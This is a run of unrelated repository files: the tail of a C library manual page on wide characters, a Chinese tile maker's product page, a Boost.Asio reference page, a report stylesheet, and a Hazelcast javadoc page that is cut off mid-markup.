being able to use their own language adequately are a thing of the past. <p>One final comment about the choice of the wide character representation is necessary at this point. We have said above that the natural choice is using Unicode or ISO&nbsp;10646<!-- /@w -->. This is not required, but at least encouraged, by the ISO&nbsp;C<!-- /@w --> standard. The standard defines at least a macro <code>__STDC_ISO_10646__</code> that is only defined on systems where the <code>wchar_t</code> type encodes ISO&nbsp;10646<!-- /@w --> characters. If this symbol is not defined one should avoid making assumptions about the wide character representation. If the programmer uses only the functions provided by the C library to handle wide character strings there should be no compatibility problems with other systems. </body></html>
cpyfw/cpfl/czpj/2014-09-23/587.html
306076197/hudson
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>峥嵘岁月</title> <meta name="keywords" content="" /> <meta name="description" content="名称:峥嵘岁月<br /> 型号:HDFG06-7<br /> " /> <meta name="author" content="哈德逊瓷砖网络营销部Chan,哈德逊瓷砖官网 - www.hudsonhome.cn" /> <link rel="stylesheet" type="text/css" href="http://www.hudson.com/skin/default/css/style.css" /> <script type="text/javascript" src="http://www.hudson.com/skin/default/js/jquery.js"></script> <script type="text/javascript" src="http://www.hudson.com/skin/default/js/jqnav.js"></script> <script src="http://www.hudson.com/skin/default/js/tab.js" type="text/javascript"></script> <!--[if lte IE 6]> <SCRIPT src="http://www.hudson.com/skin/default/js/iepng.js" type="text/javascript"></SCRIPT> <script> EvPNG.fix('div, ul, img, li, input'); </script> <![endif]--> </head> <body class="bgmm"> <!-- 头部开始 --> <script type="text/javascript"> function uaredirect(murl){ try { if(document.getElementById("bdmark") != null){ return; } var urlhash = window.location.hash; if (!urlhash.match("fromapp")){ if ((navigator.userAgent.match(/(iPhone|iPod|Android|ios|iPad)/i))) { location.replace(murl); } } } catch(err){} } uaredirect("http://www.hudson.com/wap/"); </script> <a name="gotop"></a> <div class="go"> <a title="返回顶部" class="top" href="#gotop"> <img src="http://www.hudson.com/skin/default/images/top2.png" width="50" height="50" /></a> <a class="top" href="#gotop"> <img src="http://www.hudson.com/skin/default/images/back2.png" width="50" height="50" /></a> </div> <div class="wrap"> <div name="gotop"> </div> <div class="top"> <div class="topbox2"> <div class="searchcc"> <input name="txtSelAll" id="txtSelAll" type="text" class="in_sin" value="关键字" onblur="if (this.value=='')this.value='关键字';" onclick="if (this.value=='关键字')this.value=''" /><input name="btnSearch" id="btnSearch" type="button" value="" class="ins_b" onclick="checkAll();" /> </div> <div class="lan2"> <img src="http://www.hudson.com/skin/default/images/icon_8.png" width="16" height="11" align="absmiddle" /> 中国 </div> </div> <div class="topbox1"> <a target="_blank" href="http://hudson.tmall.com/shop/view_shop.htm?spm=a1z10.4.w5001-4530759858.6.yRhs4b&scene=taobao_shop">官方商城</a> 关注我们:<a target="_blank" rel="nofollow" href="http://weibo.com/1hudson"> <img src="http://www.hudson.com/skin/default/images/icon_4.png" width="16" height="16" align="absmiddle" alt="新浪微博" title="新浪微博" /> </a> <a target="_blank" rel="nofollow" href="http://t.qq.com/hudson2006"> <img src="http://www.hudson.com/skin/default/images/icon_5.png" width="16" height="16" align="absmiddle" alt="腾讯微博" title="腾讯微博" /> </a> <a rel="nofollow" href="http://www.jiathis.com/share/" class="jiathis" target="_blank"> <img src="http://www.hudson.com/skin/default/images/icon_6.png" width="16" height="16" align="absmiddle" /> </a> </div> </div> </div> <div class="head"> <div class="navbg" id="navbg"> </div> <div class="wrap"> <div class="headone"> <h1> <a href="http://www.hudson.com/"> <img src="http://www.hudson.com/skin/default/images/logo.png"/></a></h1> <div class="nav"> <ul class="navlist"> <li><a href="http://www.hudson.com/">首 页</a></li> </ul> <ul class="navlist" id="nav"> <li class="lihover"><a href="http://www.hudson.com/zjhdx/2014-02-22/6.html">走进哈德逊</a> <div class="navbox"> <p class="boxlist"> <span><a href="http://www.hudson.com/zjhdx/2014-02-22/6.html">企业简介</a></span> <span><a href="/zjhdx/2014-02-22/7.html">哈德逊企业文化</a></span> <span><a href="/zjhdx/2014-02-22/8.html">发展历程</a></span> <span><a href="/zjhdx/2014-02-22/9.html">哈德逊在全球</a></span> <span><a href="/zjhdx/2014-02-22/10.html">哈德逊荣誉</a></span> <span><a href="http://www.hudson.com/zjhdx/2014-02-22/11.html">联系我们</a></span> </p> </div> </li> <li class="lihover"><a href="http://www.hudson.com/xwzx/hdzq/">新闻资讯</a> <div class="navbox"> <p class="boxlist" style="padding-left: 50px;"> <span><a href="http://www.hudson.com/xwzx/hdzq">活动专区</a></span> <span><a href="http://www.hudson.com/xwzx/qyxw">企业新闻</a></span> <span><a href="http://www.hudson.com/xwzx/axgy">爱心公益</a></span> </p> </div> </li> <li class="bg lihover"><a href="http://www.hudson.com/cpyfw/zxcp/">产品与服务</a> <div class="navbox"> <p class="boxlist" style="padding-left: 180px;"> <span><a href="http://www.hudson.com/cpyfw/zxcp">最新产品</a></span> <span><a href="http://www.hudson.com/cpyfw/cpfl">产品分类</a></span> <span><a href="http://www.hudson.com/cpyfw/zszx">知识中心</a></span> <span><a href="http://www.hudson.com/cpyfw/zxfk/2014-03-02/65.html">在线问答</a></span> </p> </div> </li> <li class="bg lihover"><a href="http://www.hudson.com/cptyg/alzs/">产品体验馆</a> <div class="navbox"> <p class="boxlist" style="padding-left: 310px;"> <span><a href="http://www.hudson.com/cptyg/alzs">案例展示</a></span> <span><a href="http://www.hudson.com/cptyg/shtyg/2014-02-25/1.html">生活体验馆</a></span> </p> </div> </li> <li class="bg lihover"><a href="http://www.hudson.com/rlzy/">人力资源</a> <div class="navbox"> <p class="boxlist" style="padding-left: 280px;"> <span><a href="http://www.hudson.com/rlzy/rcg/2014-03-02/44.html">人才观</a></span> <span><a href="http://www.hudson.com/rlzy/zwfz/2014-03-02/45.html">职位发展</a></span> <span><a href="http://www.hudson.com/rlzy/xcfl/2014-03-02/46.html">薪酬福利</a></span> <span><a href="http://www.hudson.com/rlzy/ypzn/2014-03-02/47.html">应聘指南</a></span> <span><a href="http://www.hudson.com/rlzy/zwlb/">职位列表</a></span> <span><a href="http://www.hudson.com/rlzy/wzhdx/">我在哈德逊</a></span> </p> </div> </li> <li class="lihover"><a href="http://hudson.tmall.com" style="font-weight:bold; color:#F00; font-size:20px;" target="_blank">逛商城</a></li> </ul> </div> </div> </div> </div> <!-- 头部结束 --> <div class=" wrap"> <div class="home">当前位置:<a href="http://www.hudson.com/index.html">首页</a>&nbsp;>&nbsp;<a href="http://www.hudson.com/cpyfw/">产品与服务</a>&nbsp;>&nbsp;<a href="http://www.hudson.com/cpyfw/cpfl/">产品分类</a>&nbsp;>&nbsp;<a href="http://www.hudson.com/cpyfw/cpfl/fgz/">仿古砖</a></div> </div> <div class="cls"> </div> <div class="main"> <div class="wrap"> <div class="bg_t"> </div> <div class="bg_c"> <div class="mleft"> <div class="mlefttitle"> <h2>产品分类</h2> </div> <ul class="mleftlist"> <li id="about1" class=""><span><a href="http://www.hudson.com/cpyfw/cpfl/bhz" onclick="sethover('about',1,4)">玻化砖</a></span></li> <li id="about2" class=""><span><a href="http://www.hudson.com/cpyfw/cpfl/qpy" onclick="sethover('about',2,4)">全抛釉</a></span></li> <li id="about3" class=""><span><a href="http://www.hudson.com/cpyfw/cpfl/mwz" onclick="sethover('about',3,4)">木纹砖</a></span></li> <li id="about4" class=""><span><a href="http://www.hudson.com/cpyfw/cpfl/msk" onclick="sethover('about',4,4)">马赛克</a></span></li> <li id="about5" class=""><span><a href="http://www.hudson.com/cpyfw/cpfl/whs" onclick="sethover('about',5,4)">文化石</a></span></li> <li id="about6" class=""><span><a href="http://www.hudson.com/cpyfw/cpfl/cp" onclick="sethover('about',6,4)">瓷片</a></span></li> <li id="about7" class=""><span><a href="http://www.hudson.com/cpyfw/cpfl/wjs" onclick="sethover('about',7,4)">微晶石</a></span></li> <li id="about8" class=""><span><a href="http://www.hudson.com/cpyfw/cpfl/dsbjq" onclick="sethover('about',8,4)">瓷砖背景墙</a></span></li> <li id="about9" class=""><span><a href="http://www.hudson.com/cpyfw/cpfl/fgz" onclick="sethover('about',9,4)">仿古砖</a></span></li> <li id="about10" class=""><span><a href="http://www.hudson.com/cpyfw/cpfl/czpj" onclick="sethover('about',10,4)">瓷砖配件</a></span></li> </ul> </div> <div class="mright"> <div class="news"> <div class="n_detail"> <h3> 峥嵘岁月 <p>发布日期:2015-01-06 09:57:35</p> </h3> 品牌:Hudson/哈德逊<br /> 型号:HDFG06-7<br /> 颜色分类:峥嵘岁月<br /> 尺寸:450*450<br /> 使用对象:室内地砖<br /> 计价单位:片<br /> 图案:仿石纹<br /> 风格:复古</p> <img src="http://img03.taobaocdn.com/imgextra/i3/737330099/T2pIyFXbVcXXXXXXXX_!!737330099.jpg" width="700"/> <img src="http://img04.taobaocdn.com/imgextra/i4/737330099/T2SlYuXeRaXXXXXXXX_!!737330099.jpg" width="700"/> <img src="http://img03.taobaocdn.com/imgextra/i3/737330099/T2IXBNXeXcXXXXXXXX_!!737330099.jpg" width="700"/> <img src="http://img03.taobaocdn.com/imgextra/i3/737330099/T2Lwa.XcVbXXXXXXXX_!!737330099.jpg" width="700"/> <img src="http://img04.taobaocdn.com/imgextra/i4/737330099/T2YPl1XhFdXXXXXXXX_!!737330099.jpg" width="700"/> <img src="http://img01.taobaocdn.com/imgextra/i1/737330099/T2V22vXihXXXXXXXXX_!!737330099.jpg" width="700"/> <img src="http://img03.taobaocdn.com/imgextra/i3/737330099/T2f6bvXfNXXXXXXXXX_!!737330099.jpg" width="700"/> <img src="http://img02.taobaocdn.com/imgextra/i2/737330099/T2562uXetaXXXXXXXX_!!737330099.jpg" width="700"/> <img src="http://img03.taobaocdn.com/imgextra/i3/737330099/T22R1.Xb0bXXXXXXXX_!!737330099.jpg" width="700"/> <img src="http://img02.taobaocdn.com/imgextra/i2/737330099/T2R7nBXfJXXXXXXXXX_!!737330099.jpg" width="500"/> <img src="http://img03.taobaocdn.com/imgextra/i3/737330099/TB27vNGaXXXXXarXpXXXXXXXXXX-737330099.jpg" width="700"/> <div class="dlbox"> <div class="sxpage"> <p> <strong>上一篇:</strong><a href='http://www.hudsonhome.cn/cpyfw/cpfl/fgz/2014-09-23/586.html'>凉夏之年</a></p> <p> <strong>下一篇:</strong><a href='http://www.hudsonhome.cn/cpyfw/cpfl/fgz/2014-09-23/588.html'>巴黎雨巷灰</a></p> </div> <div class="cls"> </div> <div class="fenxiang"> <!-- JiaThis Button BEGIN --> <div id="ckepop"> <span class="jiathis_txt">分享到: <!-- chan baidu begin --> <a href="javascript:window.open('http://cang.baidu.com/do/add?it='+encodeURIComponent(document.title.substring(0,76))+'&iu='+encodeURIComponent(location.href)+'&fr=ien#nw=1','_blank','scrollbars=no,width=600,height=450,left=75,top=20,status=no,resizable=yes'); void 0" style="color:#000000;text-decoration:none;font-size:12px;font-weight:normal"><span style="padding: 5px 5px 0px; font-size: 12px; margin-left: 10px; cursor: pointer;"><img border="0" alt="添加到百度搜藏" align="absmiddle" src="http://help.baidu.com/resources_new/static/images/code_socang_fav1.jpg?qq-pf-to=pcqq.c2c">&nbsp;添加到百度搜藏</span></a> <!-- chan baidu end--> </span> <a class="jiathis_button_icons_1"></a><a class="jiathis_button_icons_2"> </a><a class="jiathis_button_icons_3"></a><a class="jiathis_button_icons_4"></a> <a href="http://www.jiathis.com/share" class="jiathis jiathis_txt jtico jtico_jiathis" target="_blank"></a><a class="jiathis_counter_style"></a> </div> <script type="text/javascript" src="http://v2.jiathis.com/code/jia.js" charset="utf-8"></script> <!-- JiaThis Button END --> </div> <div class="cls"> </div> <div class="fanhui2"> <a href="#"> <img src="http://www.hudson.com/skin/default/images/img_top.jpg" width="44" height="14" /></a>&nbsp; <a href="javascript:history.go(-1);"> <img src="http://www.hudson.com/skin/default/images/img_fanhui.jpg" /></a> </div> </div> </div> </div> <div class="cls"> </div> </div> </div> <div class="bg_f"> </div> </div> </div> <div class="cls"> </div> <!-- 尾部开始 --> <div class="foot"> <div class="wrap"> <div class="fm_box"> <h3>公司动态</h3> <ul> <li><a href="http://www.hudson.com/xwzx/hdzq/">活动专区</a></li> <li><a href="http://www.hudson.com/xwzx/qyxw/">企业新闻</a></li> <li><a href="http://www.hudson.com/xwzx/axgy/">爱心公益</a></li> </ul> </div> <div class="fm_box"> <h3>关于哈德逊</h3> <ul> <li><a href="http://www.hudson.com/">董事长介绍</a></li> <li><a href="http://www.hudson.com/zjhdx/2014-02-22/6.html">企业简介</a></li> <li><a href="http://www.hudson.com/zjhdx/2014-02-22/7.html">企业文化</a></li> <li><a href="http://www.hudson.com/zjhdx/2014-02-22/8.html">发展历程</a></li> <li><a href="http://www.hudson.com/zjhdx/2014-02-22/11.html">联系我们</a></li> <li><a href="http://www.hudson.com/zjhdx/2014-02-22/10.html">哈德逊荣誉</a></li> </ul> </div> <div class="fm_box"> <h3>最新职位</h3> <ul> <li><a href="/rlzy/zwlb/2014-03-11/156.html" title="市场经理/销售经理">市场经理/销售</a></li> <li><a href="/rlzy/zwlb/2014-03-11/155.html" title="策划推广主管/专员">策划推广主管/</a></li> <li><a href="/rlzy/zwlb/2014-03-11/154.html" title="应届本科、硕士毕业生、留学生">应届本科、硕士</a></li> <li><a href="/rlzy/zwlb/2014-03-11/153.html" title="质检员">质检员</a></li> <li><a href="/rlzy/zwlb/2014-03-11/152.html" title="网店销售业务员">网店销售业务员</a></li> </ul> </div> <div class="fm_box"> <h3>人力资源</h3> <ul> <li><a href="http://www.hudson.com/rlzy/rcg/2014-03-02/44.html">人才观</a></li> <li><a href="http://www.hudson.com/rlzy/zwfz/2014-03-02/45.html">职位发展</a></li> <li><a href="http://www.hudson.com/rlzy/xcfl/2014-03-02/46.html">薪酬福利</a></li> <li><a href="http://www.hudson.com/rlzy/ypzn/2014-03-02/47.html">应聘指南</a></li> <li><a href="">职位列表</a></li> <li><a href="http://www.hudson.com/rlzy/wzhdx/">我在哈德逊</a></li> </ul> </div> <div class="fm_box" style="margin:0"> <h3>产品</h3> <ul> <li><a href="http://www.hudson.com/cpyfw/cpfl/czpj">瓷砖配件</a></li> <li><a href="http://www.hudson.com/cpyfw/cpfl/fgz">仿古砖</a></li> <li><a href="http://www.hudson.com/cpyfw/cpfl/dsbjq">瓷砖背景墙</a></li> <li><a href="http://www.hudson.com/cpyfw/cpfl/wjs">微晶石</a></li> <li><a href="http://www.hudson.com/cpyfw/cpfl/cp">瓷片</a></li> <li><a href="http://www.hudson.com/cpyfw/cpfl/whs">文化石</a></li> <li><a href="http://www.hudson.com/cpyfw/cpfl/msk">马赛克</a></li> </ul> </div> </div> <div class="mfoot" style=" padding-top: 20px;"> <div class="warp" style=" text-align:center; border-bottom:#999 solid 1px;"> 友情链接: <a href="http://www.sun-cad.com" target="_blank">散热器</a> <a href="http://www.zjhenghui.cn" target="_blank">头盔镜片</a> <a href="http://www.chinagzn.com" target="_blank">硅藻泥</a> <a href="http://www.ganji.com/nuanqi" target="_blank">暖气</a> <a href="http://www.china-lz.com" target="_blank">天津办公家具</a> <a href="http://beihai.to8to.com" target="_blank">北海装修网</a> <a href="http://tianjin.haogongzhang.com" target="_blank">天津装修队</a> <a href="http://www.xuexi111.com/s/jiaju" target="_blank">家居装修设计</a> <a href="http://www.reaz.com.cn" target="_blank">高端家居品牌</a> <a href="http://xining.66zhuang.com" target="_blank">西宁装修网</a> <a href="http://www.lejj.com/cizhuan/" target="_blank">瓷砖</a> <a href="http://www.meilele.com/category-cizhuan/" target="_blank">瓷砖</a> <a href="http://jxyczs.cn/" target="_blank">南昌装修公司</a> <a href="http://beijing.kuyiso.com/jiancai/" target="_blank">北京建材加盟</a> <a href="http://www.qianlima.com/zb/area_304/" target="_blank">佛山招标网</a> <a href="http://www.whczs.com/" target="_blank">南宁装修公司</a> <a href="http://bj.fenlei.3ghuashang.com/zhuangxiu/" target="_blank">北京装修公司</a> <a href="http://huiz.pupuwang.com/" target="_blank">惠州商铺转让网</a> <a href="http://world.fang.com/Singapore/" target="_blank">新加坡买房</a> <a href="http://zz.huizhuang.com/" target="_blank">郑州装修网</a> <a href="http://jiancai.11467.com/" target="_blank">中国建筑建材网</a> <a href="http://bj.ganji.com/chuguijiancai/ " target="_blank">北京橱柜公司</a> <a href="http://tj.ganji.com/dengshi/ " target="_blank">天津灯饰公司</a> <a href="http://www.mfj95.com " target="_blank">瓷砖美缝剂</a> <a href="http://www.zgdbw.cn/ " target="_blank">复合地板品牌 </a> <script type="text/javascript" src="http://links.webscan.360.cn/index/index/b447b66a05b05015e513cd4b065ed8f6"></script> </div> <div class="wrap"> 佛山哈德逊股份有限公司&copy;版权所有 保留所有权利 <a href="http://www.hudson.com/wzdt.htm" target="_blank">网站地图</a> 展销中心:+86-757-82278159 客户服务中心:+86-757-82278159 <script type="text/javascript"> var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://"); document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Faed9e7d575a1cc8a944631fa5314681e' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript">var cnzz_protocol = (("https:" == document.location.protocol) ? " https://" : " http://");document.write(unescape("%3Cspan id='cnzz_stat_icon_5915010'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "s19.cnzz.com/stat.php%3Fid%3D5915010%26show%3Dpic' type='text/javascript'%3E%3C/script%3E"));</script><br/> </div> </div> </div> <!-- 尾部结束 --> </body> </html>
myodd/boost/libs/asio/doc/html/boost_asio/reference/socket_base/non_blocking_io.html
FFMG/myoddweb.piger
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=US-ASCII"> <title>socket_base::non_blocking_io</title> <link rel="stylesheet" href="../../../../../../../doc/src/boostbook.css" type="text/css"> <meta name="generator" content="DocBook XSL Stylesheets V1.79.1"> <link rel="home" href="../../../index.html" title="Boost.Asio"> <link rel="up" href="../socket_base.html" title="socket_base"> <link rel="prev" href="message_peek.html" title="socket_base::message_peek"> <link rel="next" href="receive_buffer_size.html" title="socket_base::receive_buffer_size"> </head> <body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"> <table cellpadding="2" width="100%"><tr> <td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../../../../boost.png"></td> <td align="center"><a href="../../../../../../../index.html">Home</a></td> <td align="center"><a href="../../../../../../../libs/libraries.htm">Libraries</a></td> <td align="center"><a href="http://www.boost.org/users/people.html">People</a></td> <td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td> <td align="center"><a href="../../../../../../../more/index.htm">More</a></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="message_peek.html"><img src="../../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../socket_base.html"><img src="../../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../index.html"><img src="../../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="receive_buffer_size.html"><img src="../../../../../../../doc/src/images/next.png" alt="Next"></a> </div> <div class="section"> <div class="titlepage"><div><div><h4 class="title"> <a name="boost_asio.reference.socket_base.non_blocking_io"></a><a class="link" href="non_blocking_io.html" title="socket_base::non_blocking_io">socket_base::non_blocking_io</a> </h4></div></div></div> <p> <a class="indexterm" name="idm45464965689280"></a> (Deprecated: Use non_blocking().) IO control command to set the blocking mode of the socket. </p> <pre class="programlisting"><span class="keyword">typedef</span> <span class="identifier">implementation_defined</span> <span class="identifier">non_blocking_io</span><span class="special">;</span> </pre> <p> Implements the FIONBIO IO control command. </p> <h6> <a name="boost_asio.reference.socket_base.non_blocking_io.h0"></a> <span class="phrase"><a name="boost_asio.reference.socket_base.non_blocking_io.example"></a></span><a class="link" href="non_blocking_io.html#boost_asio.reference.socket_base.non_blocking_io.example">Example</a> </h6> <pre class="programlisting"><span class="identifier">boost</span><span class="special">::</span><span class="identifier">asio</span><span class="special">::</span><span class="identifier">ip</span><span class="special">::</span><span class="identifier">tcp</span><span class="special">::</span><span class="identifier">socket</span> <span class="identifier">socket</span><span class="special">(</span><span class="identifier">io_service</span><span class="special">);</span> <span class="special">...</span> <span class="identifier">boost</span><span class="special">::</span><span class="identifier">asio</span><span class="special">::</span><span class="identifier">socket_base</span><span class="special">::</span><span class="identifier">non_blocking_io</span> <span class="identifier">command</span><span class="special">(</span><span class="keyword">true</span><span class="special">);</span> <span class="identifier">socket</span><span class="special">.</span><span class="identifier">io_control</span><span class="special">(</span><span class="identifier">command</span><span class="special">);</span> </pre> <h6> <a name="boost_asio.reference.socket_base.non_blocking_io.h1"></a> <span class="phrase"><a name="boost_asio.reference.socket_base.non_blocking_io.requirements"></a></span><a class="link" href="non_blocking_io.html#boost_asio.reference.socket_base.non_blocking_io.requirements">Requirements</a> </h6> <p> <span class="emphasis"><em>Header: </em></span><code class="literal">boost/asio/socket_base.hpp</code> </p> <p> <span class="emphasis"><em>Convenience header: </em></span><code class="literal">boost/asio.hpp</code> </p> </div> <table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr> <td align="left"></td> <td align="right"><div class="copyright-footer">Copyright &#169; 2003-2016 Christopher M. Kohlhoff<p> Distributed under the Boost Software License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>) </p> </div></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="message_peek.html"><img src="../../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../socket_base.html"><img src="../../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../index.html"><img src="../../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="receive_buffer_size.html"><img src="../../../../../../../doc/src/images/next.png" alt="Next"></a> </div> </body> </html>
styles/report.css
mnp/tourist-train-pos
body { font-family:Geneva,Arial,Helvetica,sans-serif; font-size:16px; background-color:white color:black; } html { scrollbar-base-color:#666699; scrollbar-arrow-color:#ddddff; } pre { font-family: "monospace"; } .number { text-align:right; background-color:white; } .money { text-align:right; background-color:#99ff99; } .total { background-color:#99ff99; color:black; text-align:right; font-weight:bold; } .subtotal { color:black; text-align:right; font-weight:bold; } form { margin:0px; } a { color:#333399; text-decoration:none; } a:hover { color:blue; text-decoration:underline; } a.menuitem { color:#eeeeff; font-family:Verdana,Helvetica,sans-serif; font-size:11px; font-weight:normal; } a.menuitem:hover { color:yellow; } a.helpitem { color:#cccccc; font-family:Verdana,Helvetica,sans-serif; font-size:12px; font-weight:normal; } a.helpitem:hover { color:yellow; } a.widget { color:#222244; font-family:Verdana,Helvetica,sans-serif; font-size:11px; } a.widget:hover { color:blue; background-color:#e9e9e9; } .outline { background-color:black; } .menu { color:white; background-color:#444466; font-family:Verdana,Helvetica,sans-serif; } .header { color:#ccccee; background-color:#444466; font-family:Verdana,Helvetica,sans-serif; font-weight:bold; font-size:17px; } .header:hover { color:white; } .light { color:white; font-family:Geneva,Arial,Helvetica,sans-serif; font-size:12px; } .smallheader { color:#ccccee; background-color:#444466; font-family:Geneva,Arial,Helvetica,sans-serif; font-size:12px; } .smallheader:hover { color:white; } .small { color:#aaaacc; font-family:Geneva,Arial,Helvetica,sans-serif; font-size:11px; } .legend { color:#000000; font-family:Geneva,Arial,Helvetica,sans-serif; font-size:11px; } .control { color:black; background-color:#669999; } .item { color:black; background-color:#e9e9e9; } .itemheader { background-color:#cccccc; color:#444466; font-weight:bold; font-family:Geneva,Arial,Helvetica,sans-serif; font-size:12px; } .button{ color:white; background-color:#666699; border-bottom:thin solid #222244; border-right:thin solid #222244; border-top:thin solid #9999cc; border-left:thin solid #9999cc; font-size:11px;font-family:Verdana,Helvetica,sans-serif; font-weight:normal; } .selected { background-color:#bbcbff; } .text { color:black; background-color:white; } .item0 { background-color:#f3f3f3; } .item1 { background-color:#ccffff; } .hotitem { foreground-color:#bbcbff; } .smallhot { color:yellow; background-color:#444466; font-family:Geneva,Arial,Helvetica,sans-serif; font-size:12px; } .fixed { font-size:13px; font-family:monospace, fixed; } td { font-size:12px; font-family:Geneva,Arial,Helvetica,sans-serif; } th { font-size:12px; font-family:Geneva,Arial,Helvetica,sans-serif; } .list { background-color:#f0f0ff; } .listlt { background-color:#ffffff; } option { font-size:12px; } select { font-size:12px; } .error { color:black; background-color:#ff9900; font-family:Verdana,Helvetica,sans-serif; font-size:12px; } .warning { background-color:yellow; color:black; font-size:12px; } .message { color:black; background-color:#e9e9e9; font-size:12px; } .red { color:white; background-color:red; } .yellow { color:black; background-color:yellow; } .label { font-weight: bold; text-align: right; } .value { font-weight: normal; text-align: right; } .value2 { font-weight: bold; text-align: right; } .valuebox { font-weight: bold; border: 1px solid black; padding: 0.1em; }
Hazelcast/javadoc/com/hazelcast/monitor/package-use.html
danielvdwal/AVS_ParkingLot
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_51) on Mon Jul 21 11:18:42 EEST 2014 --> <meta http-equiv="Content-Type" content="text/html" charset="UTF-8"> <title>Uses of Package com.hazelcast.monitor (Hazelcast Root 3.2.4 API)</title> <meta name="date" content="2014-07-21"> <link rel="stylesheet" type="text/css" href="../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Package com.hazelcast.monitor (Hazelcast Root 3.2.4 API)"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li>Class</li> <li class="navBarCell1Rev">Use</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../index-all.html">Index</a></li> <li><a href="../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../index.html?com/hazelcast/monitor/package-use.html" target="_top">Frames</a></li> <li><a href="package-use.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h1 title="Uses of Package com.hazelcast.monitor" class="title">Uses of Package<br>com.hazelcast.monitor</h1> </div> <div class="contentContainer"> <ul class="blockList"> <li class="blockList"> <table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing packages, and an explanation"> <caption><span>Packages that use <a href="../../../com/hazelcast/monitor/package-summary.html">com.hazelcast.monitor</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Package</th> <th class="colLast" scope="col">Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><a href="#com.hazelcast.core">com.hazelcast.core</a></td> <td class="colLast"> <div class="block">Provides core API interfaces/classes.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="#com.hazelcast.monitor">com.hazelcast.monitor</a></td> <td class="colLast"> <div class="block">Contains Hazelcast statistics interfaces related to map, queue, topic, multimap, executor service etc.</div> </td> </tr> </tbody> </table> </li> <li class="blockList"><a name="com.hazelcast.core"> <!-- --> </a> <table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing classes, and an explanation"> <caption><span>Classes in <a href="../../../com/hazelcast/monitor/package-summary.html">com.hazelcast.monitor</a> used by <a href="../../../com/hazelcast/core/package-summary.html">com.hazelcast.core</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colOne" scope="col">Class and Description</th> </tr> <tbody> <tr class="altColor"> <td class="colOne"><a href="../../../com/hazelcast/monitor/class-use/LocalExecutorStats.html#com.hazelcast.core">LocalExecutorStats</a>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colOne"><a href="../../../com/hazelcast/monitor/class-use/LocalMapStats.html#com.hazelcast.core">LocalMapStats</a> <div class="block">Local map statistics.</div> </td> </tr> <tr class="altColor"> <td class="colOne"><a href="../../../com/hazelcast/monitor/class-use/LocalMultiMapStats.html#com.hazelcast.core">LocalMultiMapStats</a>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colOne"><a href="../../../com/hazelcast/monitor/class-use/LocalQueueStats.html#com.hazelcast.core">LocalQueueStats</a> <div class="block">Local queue statistics.</div> </td> </tr> <tr class="altColor"> <td class="colOne"><a href="../../../com/hazelcast/monitor/class-use/LocalTopicStats.html#com.hazelcast.core">LocalTopicStats</a>&nbsp;</td> </tr> </tbody> </table> </li> <li class="blockList"><a name="com.hazelcast.monitor"> <!-- --> </a> <table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing classes, and an explanation"> <caption><span>Classes in <a href="../../../com/hazelcast/monitor/package-summary.html">com.hazelcast.monitor</a> used by <a href="../../../com/hazelcast/monitor/package-summary.html">com.hazelcast.monitor</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colOne" scope="col">Class and Description</th> </tr> <tbody> <tr class="altColor"> <td class="colOne"><a 